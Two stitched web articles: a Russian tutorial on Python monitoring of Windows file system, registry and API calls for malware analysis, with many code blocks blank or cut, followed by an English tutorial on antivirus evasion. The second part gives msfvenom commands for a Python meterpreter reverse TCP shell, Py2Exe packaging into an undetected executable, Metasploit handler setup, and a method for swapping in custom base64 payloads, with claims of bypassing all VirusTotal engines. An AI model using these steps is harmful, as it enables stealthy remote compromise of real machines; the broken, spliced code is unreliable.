Пос­коль­ку в качес­тве одно­го из парамет­ров ReadDirectoryChangesW() при­нима­ет кон­стан­ты, опре­деля­ющие тип отсле­жива­емо­го события, то опре­делим метод, пре­обра­зующий зна­чения парамет­ра notify_filter в ука­зан­ные кон­стан­ты.

def _get_notify_filter_const(self):

    if self._notify_filter == ‘FileNameChange’:

        return win32con.FILE_NOTIFY_CHANGE_FILE_NAME


Здесь для прос­тоты показа­но пре­обра­зова­ние в кон­стан­ту толь­ко одно­го зна­чения
notify_filter, по ана­логии мож­но опи­сать пре­обра­зова­ние дру­гих зна­чений
notify_filter в кон­стан­ты

Да­лее опре­делим методы, воз­вра­щающие сох­ранен­ные в буфере _buffer свой­ства события при нас­тупле­нии это­го события. Воз­вра­щающий тип события метод выг­лядит так:

def _get_event_type(self):

    result = »

    if self._num_bytes_returned != 0:

        result = self._ACTIONS.get(win32file.FILE_NOTIFY_INFORMATION(

            self._buffer, self._num_bytes_returned)[0][0], ‘Uncnown’)

    return result

В этом методе исполь­зует­ся кон­стан­та _ACTIONS, содер­жащая воз­можные дей­ствия с отсле­жива­емым фай­лом или катало­гом. Эта кон­стан­та опре­деле­на в виде сло­варя сле­дующим обра­зом:


    0x00000000: ‘Unknown action’,

    0x00000001: ‘Added’,

    0x00000002: ‘Removed’,

    0x00000003: ‘Modified’,

    0x00000004: ‘Renamed from file or directory’,

    0x00000005: ‘Renamed to file or directory’


Ме­тод, воз­вра­щающий путь к отсле­жива­емо­му фай­лу:

def _get_path(self):

    result = »

    if self._num_bytes_returned != 0:

        result = win32file.GetFinalPathNameByHandle(




    return result

Ме­тод, воз­вра­щающий имя отсле­жива­емо­го фай­ла, которое было сох­ранено в _buffer при нас­тупле­нии события:

def _get_file_name(self):

    result = »

    if self._num_bytes_returned != 0:

        result = win32file.FILE_NOTIFY_INFORMATION(

            self._buffer, self._num_bytes_returned)[0][1]

    return result

За­дей­ство­вать это все мож­но сле­дующим обра­зом (по ана­логии с монито­рин­гом про­цес­сов):





























from threading import Thread

import pywintypes

import win32api

import win32event

import win32con

import win32file

import winnt


# Не забываем вставить здесь описание классов FileMonitor и FileMonitorAPI


# Опишем класс Monitor, наследуемый от Thread

class Monitor(Thread):

    def __init__(self):


    def run(self):

        # Используем значение notify_filter по умолчанию

        file_mon = pymonitor.FileMonitorAPI(Path=r‘e:\example’)

        while True:







# Создадим экземпляр класса Monitor

mon = Monitor()

# Запустим процесс мониторинга


Используем WMI

Мо­нито­ринг событий фай­ловой сис­темы с исполь­зовани­ем WMI похож на ранее рас­смот­ренное отсле­жива­ние событий с про­цес­сами. Для того что­бы сле­дить за изме­нени­ями кон­крет­ного фай­ла, вос­поль­зуем­ся сле­дующим кодом:

import wmi

notify_filter = «creation»

# «Наблюдатель» за изменениями в файле

file_watcher = wmi.WMI().CIM_DataFile.watch_for(

    notify_filter, Drive = ‘e:’, Path=r‘\example_dir\’, FileName=‘example_file’, Extension = ‘txt’


while True:

    # Выводим информацию о событии с файлом

    new_file = file_watcher()



Здесь вид­но, что, помимо парамет­ра notify_filter, еще переда­ются парамет­ры, опре­деля­ющие файл, события которо­го необ­ходимо отсле­живать. Обра­ти вни­мание на осо­бен­ность написа­ния парамет­ра Path с модифи­като­ром r (он нужен для того, что­бы получить тре­буемое количес­тво сле­шей‑раз­делите­лей в стро­ке).

Для отсле­жива­ния изме­нений в катало­ге, а не в фай­ле вмес­то клас­са CIM_DataFile необ­ходимо исполь­зовать класс CIM_Directory (более под­робно о работе с фай­ловой сис­темой с помощью WMI мож­но почитать здесь):

directory_watcher = wmi.WMI().CIM_Directory.watch_for(

    notify_filter, Drive = ‘e:’, Path=r‘\example_dir\’


Ко­неч­но, все это желатель­но офор­мить в виде клас­са — нас­ледни­ка от нашего базово­го клас­са FileMonitor, опи­сан­ного выше, что­бы монито­ринг событий фай­ловой сис­темы мож­но было запус­тить в отдель­ном потоке. В целом пол­ную реали­зацию опи­сан­ных клас­сов по монито­рин­гу фай­ловой сис­темы мож­но пос­мотреть на моем гит­хабе.

Мониторим действия с реестром
Так же как и события фай­ловой сис­темы, события реес­тра мож­но отсле­живать либо с помощью спе­циали­зиро­ван­ных API-фун­кций, либо с исполь­зовани­ем механиз­мов WMI. Пред­лагаю, как и в слу­чае с событи­ями фай­ловой сис­темы, начать с написа­ния базово­го клас­са RegistryMonitir, от которо­го нас­ледовать клас­сы RegistryMonitorAPI и RegistryMomitorWMI:































class RegistryMonitor:

    def __init__(self, notify_filter, **kwargs):

        self._notify_filter = notify_filter

        self._kwargs = kwargs

        self._event_properties = {

            ‘Hive’: None,

            ‘RootPath’: None,

            ‘KeyPath’: None,

            ‘ValueName’: None,

            ‘Timestamp’: None,

            ‘EventType’: None,



    def hive(self):

        return self._event_properties[‘Hive’]


    def root_path(self):

        return self._event_properties[‘RootPath’]


    def key_path(self):

        return self._event_properties[‘KeyPath’]


    def value_name(self):

        return self._event_properties[‘ValueName’]


    def timestamp(self):

        return self._event_properties[‘Timestamp’]


    def event_type(self):

        return self._event_properties[‘EventType’]

Здесь в **kwargs переда­ются парамет­ры Hive, RootPath, KeyPath и ValueName, зна­чения которых и опре­деля­ют мес­то в реес­тре, за которым мы будем сле­дить. Зна­чение парамет­ра notify_filter, как и в пре­дыду­щих слу­чаях, опре­деля­ет отсле­жива­емые дей­ствия.

Используем API

Здесь мы так же, как и в слу­чае с фай­ловой сис­темой, исполь­зуем связ­ку API-фун­кций CreateEvent() и WaitForSingleObject(). При этом хендл отсле­жива­емо­го объ­екта получим с исполь­зовани­ем RegOpenKeyEx() со зна­чени­ем пос­ледне­го парамет­ра (которым опре­деля­ется дос­туп к жела­емо­му клю­чу реес­тра):

class RegistryMonitorAPI(RegistryMonitor):

    def __init__(self, notify_filter=‘UnionChange’, **kwargs):

        RegistryMonitor.__init__(self, notify_filter, **kwargs)

        # Создаем объект «событие»

        self._event = win32event.CreateEvent(None, False, False, None)

        # Открываем нужный ключ с правами доступа на уведомление изменений

        self._key = win32api.RegOpenKeyEx(






        # Устанавливаем наблюдатель


Фун­кция _get_hive_const() пре­обра­зует имя кус­та реес­тра в соот­ветс­тву­ющую кон­стан­ту (HKEY_CLASSES_ROOT, HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE, HKEY_USERS или HKEY_CURRENT_CONFIG):

def _get_hive_const(self):

    if self._kwargs[‘Hive’] == ‘HKEY_CLASSES_ROOT’:

        return win32con.HKEY_CLASSES_ROOT


    if self._kwargs[‘Hive’] == ‘HKEY_CURRENT_CONFIG’:

        return win32con.HKEY_CURRENT_CONFIG

Сам же «наб­людатель» реали­зуем с помощью API-фун­кции RegNotifyChangeKeyValue():

def _set_watcher(self):








Здесь _get_notify_filter(), исхо­дя из зна­чения notify_filter, выда­ет кон­стан­ту, опре­деля­ющую событие, на которое будет реак­ция (REG_NOTIFY_CHANGE_NAME, REG_NOTIFY_CHANGE_LAST_SET), или их дизъ­юнкцию:

def _get_notify_filter_const(self):

    if self._notify_filter == ‘NameChange’:

        return win32api.REG_NOTIFY_CHANGE_NAME

    if self._notify_filter == ‘LastSetChange’:

        return win32api.REG_NOTIFY_CHANGE_LAST_SET

    if self._notify_filter == ‘UnionChange’:

        return (

            win32api.REG_NOTIFY_CHANGE_NAME |



Ме­тод update() прак­тичес­ки пол­ностью пов­торя­ет таковой из клас­са FileMonitorAPI().

def update(self):

    while True:

        result = win32event.WaitForSingleObject(self._event, 0)

        if result == win32con.WAIT_OBJECT_0:

            self._event_properties[‘Hive’] = self._kwargs[‘Hive’]

            self._event_properties[‘KeyPath’] = self._kwargs[‘KeyPath’]




Во­обще, у API-фун­кций, пред­назна­чен­ных для отсле­жива­ния изме­нений в фай­ловой сис­теме или в реес­тре, есть осо­бен­ность, зак­люча­ющаяся в том, что зна­чение вре­мени нас­тупле­ния события сами эти фун­кции не фик­сиру­ют (в отли­чие от клас­сов WMI), и в слу­чае необ­ходимос­ти это надо делать самому (к при­меру, исполь­зуя datatime).

timestamp = datetime.datetime.fromtimestamp(



Дан­ный кусочек кода необ­ходимо вста­вить в метод update() (как клас­са FileMonitorAPI, так и клас­са RegistryMonitorAPI) пос­ле про­вер­ки усло­вия появ­ления события, и в перемен­ной timestamp запишет­ся соот­ветс­тву­ющее вре­мя.

Используем WMI

Здесь име­ется два отли­чия отно­ситель­но клас­са FileMonitorWMI. Пер­вое: события, свя­зан­ные с реес­тром, явля­ются внеш­ними (в то вре­мя как события, свя­зан­ные с про­цес­сами и фай­ловой сис­темой, — внут­ренние). Вто­рое: для монито­рин­га изме­нений в вет­ке реес­тра, клю­че реес­тра или зна­чении, записан­ном в какой‑либо ключ, необ­ходимо исполь­зовать раз­ные клас­сы WMI: RegistryTreeChangeEvent, RegistryKeyChangeEvent или RegistryValueChangeEvent.

Со­ответс­твен­но, уста­нов­ка «наб­людате­ля» при ини­циали­зации экзем­пля­ра клас­са RegisterMonitorWMI в дан­ном слу­чае будет выг­лядеть так:
























def __init__(self, notify_filter=‘ValueChange’, **kwargs):

    RegistryMonitor.__init__(self, notify_filter, **kwargs)

    # Подключаем пространство имен с классами внешних событий

    wmi_obj = wmi.WMI(namespace=‘root/DEFAULT’)

    # Мониторим изменения ветки реестра

    if notify_filter == ‘TreeChange’:

        self._watcher = wmi_obj.RegistryTreeChangeEvent.watch_for(




    # Мониторим изменения ключа реестра

    elif notify_filter == ‘KeyChange’:

        self._watcher = wmi_obj.RegistryKeyChangeEvent.watch_for(




    # Мониторим изменения значения

    elif notify_filter == ‘ValueChange’:

        self._watcher = wmi_obj.RegistryValueChangeEvent.watch_for(





Все осталь­ное (в том чис­ле и метод update()), в прин­ципе, очень похоже на FileMonitorWMI. Пол­ностью всю реали­зацию клас­сов RegisterMonitor, RegisterMonitorAPI и RegisterMonitorWMI мож­но пос­мотреть здесь.

Мониторим вызовы API-функций

Здесь, как мы и говори­ли, нам понадо­бит­ся WinAppDbg. Вооб­ще, с помощью это­го модуля мож­но не толь­ко перех­ватывать вызовы API-фун­кций, но и делать очень мно­го дру­гих полез­ных вещей (более под­робно об этом мож­но узнать в докумен­тации WinAppDbg). К сожале­нию, помимо того что модуль ори­енти­рован исклю­читель­но для работы со вто­рой вер­сией Python, он исполь­зует стан­дар­тный механизм отладки Windows. Поэто­му если ана­лизи­руемая прог­рамма осна­щена хотя бы прос­тей­шим модулем анти­отладки (а об этих модулях мож­но почитать, нап­ример, в стать­ях «Ан­тиот­ладка. Теория и прак­тика защиты при­ложе­ний от дебага» и «Биб­лиоте­ка анти­отладчи­ка)», то перех­ватить вызовы API не получит­ся. Тем не менее это весь­ма мощ­ный инс­тру­мент, потому знать о его сущес­тво­вании и хотя бы в минималь­ной сте­пени овла­деть его воз­можнос­тями будет весь­ма полез­но.

Итак, для перех­вата API-фун­кции будем исполь­зовать класс EventHandler, от которо­го нас­леду­ем свой класс (назовем его, к при­меру APIIntercepter). В нем мы реали­зуем нуж­ные нам фун­кции.

# Не забудем подключить нужные модули

from winappdbg import Debug, EventHandler

from winappdbg.win32 import *

class APIIntercepter(EventHandler):

    # Будем перехватывать API-функцию GetProcAddress из kernel32.dll

    apiHooks = {

        ‘kernel32.dll’ : [

            (‘GetProcAddress’, (HANDLE, PVOID)),



Как вид­но, в сос­таве клас­са EventHandler опре­делен сло­варь apiHooks, в который при опи­сании клас­са‑нас­ледни­ка необ­ходимо про­писать все перех­ватыва­емые фун­кции, не забыв про наз­вания DLL-биб­лиотек. Фор­ма записи сле­дующая:

‘<имя DLL-библиотеки_1>’ : [

    (‘<имя API-функции_1>’, (<параметр_1>, <параметр_2>, <параметр_3>, ...),

    (‘<имя API-функции_2>’, (<параметр_1>, <параметр_2>, <параметр_3>, ...),

    (‘<имя API-функции_3>’, (<параметр_1>, <параметр_2>, <параметр_3>, ...),



‘<имя DLL-библиотеки_2>’ : [

    (‘<имя API-функции_1>’, (<параметр_1>, <параметр_2>, <параметр_3>, ...),

    (‘<имя API-функции_2>’, (<параметр_1>, <параметр_2>, <параметр_3>, ...),

    (‘<имя API-функции_3>’, (<параметр_1>, <параметр_2>, <параметр_3>, ...),




Что­бы пра­виль­но сфор­мировать дан­ный сло­варь, нуж­но знать про­тоти­пы перех­ватыва­емых фун­кций (то есть перечень и типы переда­ваемых в фун­кции парамет­ров). Все это мож­но пос­мотреть в MSDN.

Пос­ле того как мы опре­дели­лись с переч­нем перех­ватыва­емых фун­кций, необ­ходимо для каж­дой перех­ватыва­емой API-фун­кции написать два метода: пер­вый будет сра­баты­вать при вызове фун­кции, вто­рой — при завер­шении ее работы. Для фун­кции GetProcAddress() эти методы выг­лядят так:





















# Вызывается при вызове GetProcAddress

def pre_GetProcAddress(self, event, retaddr, hModule, lpProcName):

    # Выводим информацию при запуске функции

    # Получаем имя переданной в GetProcAddress в качестве параметра функции

    string = event.get_process().peek_string(lpProcName)

    # Получаем ID потока, в котором произошел вызов GetProcAddress

    tid    = event.get_tid()

    # Выводим это все на экран

    print «%d: Call GetProcAddress: %s» % (tid, string)

# Вызывается при завершении GetProcAddress

def post_GetProcAddress(self, event, retval):

    # Выводим информацию по завершении функции

    # Получаем ID потока, в котором произошел вызов GetProcAddress

    tid = event.get_tid()

    # Проверяем наличие возвращаемого значения

    if retval:

        # Если возвращаемое значение не None, выводим его на экран

        print «%d: Success. Return value: %x» % (tid, retval)


        print «%d: Failed!» % tid

В метод pre_GetProcAddress пер­вым парамет­ром переда­ется объ­ект event, вто­рым — адрес воз­вра­та, треть­им и пос­леду­ющи­ми — парамет­ры перех­ватыва­емой фун­кции (здесь это прос­то перемен­ные, зна­чения которых будут записа­ны пос­ле оче­ред­ного вызова перех­ватыва­емой фун­кции, пос­ле чего их мож­но вывес­ти с помощью print). В метод post_GetProcAddress() пер­вым парамет­ром так­же переда­ется объ­ект event, вто­рым — воз­вра­щаемое перех­ватыва­емой фун­кци­ей зна­чение (реаль­ные зна­чения туда будут записа­ны пос­ле завер­шения работы перех­вачен­ной API-фун­кции).

Да­лее напишем фун­кцию, которая и уста­новит опи­сан­ный нами перех­ватчик:

def set_api_interceptor(argv):

    # Создаем экземпляр объекта Debug, передав ему экземпляр APIIntercepter

    with Debug(APIIntercepter(), bKillOnExit=True) as debug:

        # Запустим анализируемую программу в режиме отладки

        # Путь к анализируемой программе должен быть в argv


        # Ожидаем, пока не закончится отладка


И запус­тим эту фун­кцию:

import sys


В ито­ге дол­жна получить­ся при­мер­но такая кар­тина.

Пе­рех­ват фун­кции GetProcAddress (вид­но, что ана­лизи­руемый файл, ско­рее все­го, пыта­ется внед­рить что‑то в уда­лен­ный поток)
В методах, вызыва­емых при вызове и завер­шении работы API-фун­кции (в нашем слу­чае это pre_GetProcAddress() и post_GetProcAddress()), мож­но прог­рамми­ровать какие угод­но дей­ствия, а не толь­ко вывод информа­ции о вызове API-фун­кции, как это сде­лали мы.


Исполь­зуя Python и нес­коль­ко полез­ных пакетов, мож­но получить доволь­но боль­шой объ­ем информа­ции о событи­ях, про­исхо­дящих в сис­теме при запус­ке той или иной прог­раммы. Конеч­но, все это желатель­но делать в изо­лиро­ван­ном окру­жении (осо­бен­но если ана­лизи­ровать край­не подоз­ритель­ные прог­раммы).

Пол­ностью написан­ный код клас­сов ана­лиза событий про­цес­сов, фай­ловой сис­темы и реес­тра мож­но пос­мотреть на моем гит­хабе. Он так­же при­сутс­тву­ет в PyPi, что поз­воля­ет уста­новить его коман­дой pip install pywinwatcher и исполь­зовать по сво­ему усмотре­нию.

Antivirus Evasion with Python

by Marcelo Sacchetin


When deploying defense in depth security controls for your organization, you are likely to include antiviruses as part of the solution. That is definitely a good practice as long as we keep in mind that antiviruses are just adding an extra layer of protection and we should never solely depend on it for protecting end-users devices.

A good security program should always include defense in depth controls such as software update governance, firewalls, training/security awareness, physical security, identity management, password policy, etc. However, it is not uncommon for a security engineer to get challenged about the need for those extra layers, and you may need to demonstrate how antiviruses can be easily bypassed to prove your point.

In this article we will present a very straight forward tutorial on how to evade antiviruses on fully patched and updated Windows environments using a Python payload.

Keep in mind that attempting antivirus bypass is a cat and mouse game. Whenever a new evasion technique gets popular, antivirus vendors will eventually learn about it and update their signatures database to block it. Then, new evasion techniques will arise, which will make vendors to add it to their signature database, and so on and so forth.

By the time of this writing, the method described here was successfully used to bypass all the vendor engines available on Virus Total, and get the malicious artifact successfully executed on a fully updated Windows 10 machine with Windows Defender enabled.

Python Payload

Signature-based antiviruses work by comparing the artifact binaries against a signature database. Our goal is to “disguise” our payload in a way they do not match any known signatures on any antivirus vendor database. A behavior-based antivirus will try to match known suspicious activities to the actions taken by a given artifact. Our malware will work as a mere client trying to start a TCP connection on port 443. It makes harder for behavior-based antiviruses to flag actions like this without issuing a lot of false positives for legit applications such as web browsers.

For this example we are going to use a Python payload generated by MSFVenom to open a reverse TCP shell (meterpreter session) on port 443 to the attacker machine running Metasploit. An artifact like that is obviously malicious and should always be flagged by any antivirus agent.

The approach described here is flexible enough so you can extend it by replacing our sample msfvenom payload with your own customized Python payload.

Environment Setup

We recommend using 3 virtual machines for this tutorial:

Kali Linux for creating the payload and running Metasploit;

Windows Metasploitable 3 for packing the payload into an artifact;

Windows 10 fully patched for running the final artifact;

The reason we used 2 distinct Windows virtual machines is because we need a fully updated/patched box to make sure our artifact will have a very high chance to work on any given Windows environment. On the other hand, before packing the payload with Py2Exe, a fully patched machine will always flag the raw Python payload, giving you a hard time working with it. Hence, the need for the Metasploitable 3 virtual machine for handling the raw payload before it is packed.

Creating a FUD meterpreter payload with Python

For creating the the artifact we recommend using the Windows Metasploitable 3 as your main Windows environment.

Install Python 2.7.16 x86 for Windows: 


*Note: Python 2.7 x86 is required. Install the 32 bits version even if your Windows is a x64 box. Also, make sure to select the option “Add python.exe to Path” during the installation

Install Py2exe 32 bits for Python 2.7: 


Optionally, install Open SSL for Windows.

Switch to the Kali Linux machine and create the Python payload.

*Note: Our Kali Linux is using IP address Make sure you replace it by your current IP for the all the remaining steps in this tutorial.

msfvenom -p python/meterpreter/reverse_tcp LHOST= LPORT=443 -f raw -o /var/www/html/mrtp.py

service apache2 start

Copy the payload “mrtp.py” back to your Windows machine. Using powershell, run:

wget -O mrtp.py

Also, create a setup.py file with the following content:

<script src=»https://gist.github.com/msacchetin/1a8edd900608f464c749dd9060f8c8d7.js»></script>

Bundle the standalone Python executable with Py2Exe:

python.exe .setup.py py2exe

Test the artifact “mrtp.exe” created under the dist folder:

Run it:


Switch back to you Kali Linux and run Metasploit:

We assume the following configuration: Kali VM IP:


use exploit/multi/handler

set PAYLOAD python/meterpreter/reverse_tcp


set LPORT 443


*Note: Depending o how long you take to set the Metasploit handler, you may need to run mrtp.exe on the Windows box again.

Now that we have confirmed our artifact works, let’s check it against all the Antivirus engines available on VirusTotal. Visit www.virtutotal.com and provide your “mrtp.exe” file for scanning.

If everything goes well, you should get a clean report similar to the following.

Now it is time to run it on the Windows 10 machine. Copy the “mrtp.exe” file directly to the Windows 10 box. In a real life exploitation you would need to leverage some attack vector to deploy it and execute it on your target, however, that is out of the scope of this article.

Make sure your Metasploit handler is listening on port 443, and run the artifact “mrtp.exe” on the Windows 10 machine.

As shown on the screenshot, the artifact executed completely undetected and a meterpreter session was successfully established.

Customizing your own Python payload

You can leverage this technique and use your own customized Python payload. All you need to do is to repeat the steps from the previous session, editing the “mrtp.py” file after generating it with msfvenom. You will have to replace the original encoded base64 string with your own Python code.

Just as an example, let’s create a new “custom_payload.py” Python script that just prints two messages and use it as our new payload.

After creating it, we will need to encode it with base64 encoding:

cat custom_payload.py | base64

For the sample script we used, it will give us the following base64 encoded string: “cHJpbnQgKCJDdXN0b21pemVkIHBheWxvYWQiKQpwcmludCAoIkl0IHdvcmtzISIpCg==”

Now, we edit the existing “mrtp.py” script we used on the previous session, and replace the original base64 string that begins with “aW1wb3J0IHNvY2t” with our new one.

After customization, the final result should be similar to this:

Copy the new “mrtp.py” back to your Windows machine and repeat the bundling steps:

wget -O mrtp.py

python.exe .setup.py py2exe


After executing the new “mrtp.exe” bundled Python artifact we get “Customized payload” “It works” strings printed on the terminal.

At this point, you should be able to create any Python FUD artifact you want just by editing the “custom_payload.py” file and bundling it with Py2Exe.

About the Author

Marcelo Sacchetin is an Application Security Engineer at Grubhub

Expertise: Python, C/C++, Security Architecture and Design, Security Software Engineer, Threat Analysis, Application Security, Secure Software Development Lifecycle, SDL, CISSP, HMI, SCADA, ICS, IoT, Vulnerability Researcher, Vulnerability Assessments and Remediation, Malware Analysis, Software Security.

The article has been originally published at:


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